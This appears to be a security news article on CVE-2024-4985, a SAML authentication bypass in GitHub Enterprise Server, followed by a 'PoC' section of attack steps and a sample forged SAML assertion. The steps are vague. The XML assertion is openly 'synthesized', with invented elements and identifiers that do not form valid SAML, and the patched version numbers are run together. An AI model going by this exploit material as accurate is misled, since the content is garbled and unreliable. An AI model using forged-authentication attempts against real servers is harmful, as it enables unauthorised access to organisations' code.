CVE-2024-4985 (CVSS 10): Critical Authentication Bypass Flaw Found in GitHub Enterprise Server

GitHub, the world’s leading software development platform, has disclosed a critical security vulnerability (CVE-2024-4985) in its self-hosted GitHub Enterprise Server (GHES) product. The vulnerability, which carries a maximum severity rating of 10 on the Common Vulnerability Scoring System (CVSS), could allow attackers to bypass authentication and gain unauthorized access to sensitive code repositories and data.

GitHub Enterprise Server is the self-hosted version of GitHub Enterprise, tailored for businesses seeking a secure and customizable environment for source code management. Installed on an organization’s own servers or private cloud, it enables collaborative development while providing robust security and administrative controls.

The flaw resides in the optional encrypted assertions feature of GHES’s SAML single sign-on (SSO) authentication mechanism. This feature, designed to enhance security, ironically became a weak link when an attacker could forge a SAML response, impersonating a legitimate user and potentially gaining administrator privileges.

This vulnerability was discovered through GitHub’s Bug Bounty program, which rewards security researchers for identifying and reporting vulnerabilities.

It is important to note that the vulnerability only affects instances where SAML SSO is enabled with encrypted assertions, which are not activated by default. Therefore, organizations not using SAML SSO or those using SAML SSO without encrypted assertions are not impacted by this security flaw.

The primary danger posed by CVE-2024-4985 is the ability of an attacker to gain unauthorized access to GHES instances. By forging a SAML response, attackers can effectively bypass authentication mechanisms and provision accounts with site administrator privileges. For organizations utilizing the vulnerable configuration, the consequences of exploitation could be dire, including unauthorized access to source code, data breaches, and potential disruption of development operations.

GitHub has acted swiftly to address the issue, releasing patches for versions 3.9.153.10.123.11.10, and 3.12.4 of GHES. Administrators are strongly urged to update their installations immediately to mitigate the risk of compromise.

Technical vulnerability details:

The vulnerability exploits a vulnerability in the way GHES handles encrypted SAML claims. An attacker could create a fake SAML claim that contains correct user information. When GHES processes a fake SAML claim, it will not be able to validate its signature correctly, allowing an attacker to gain access to the GHES instance.

Poc: https://github.com/absholi7ly/Bypass-authentication-GitHub-Enterprise-Server

Steps:

  • Open your penetration tester.
  • Create a Web Connection Request.
  • Select the «GET» request type.
  • Enter your GHES URL.
  • Add a fake SAML Assertion parameter to your request. You can find an example of a fake SAML Assertion parameter in the GitHub documentation.
  • Check the GHES response.
  • If the response contains an HTTP status code of 200, it has successfully bypassed authentication using the fake SAML Assertion parameter.
  • If the response contains a different HTTP status code, it did not succeed in bypassing authentication.

Note: I’m going to synthesize an example using a dummy URL (https://your-ghes-instance.com). Be sure to replace it with your real GHES URL. In this example, we’ll assume that your GHES URL is https://your-ghes-instance.com. We’ll use a fake SAML Assertion parameter that looks like this:

<Assertion ID="1234567890" IssueInstant="2024-05-21T06:40:00Z" Subject="CN=John Doe,OU=Users,O=Acme Corporation,C=US">
  <Audience>https://your-ghes-instance.com</Audience>
  <SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:assertion:method:bearer">
    <SubjectConfirmationData>
      <NameID Type="urn:oasis:names:tc:SAML:2.0:nameid-type:persistent" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:basic">jdoe</NameID>
    </SubjectConfirmationData>
  </SubjectConfirmation>
  <AuthnStatement AuthnInstant="2024-05-21T06:40:00Z" AuthnContextClassRef="urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef:unspecified">
    <AuthnMethod>urn:oasis:names:tc:SAML:2.0:methodName:password</AuthnMethod>
  </AuthnStatement>
  <AttributeStatement>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.10">Acme Corporation</Attribute>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.4">jdoe@acme.com</Attribute>
  </AttributeStatement>
</Assertion>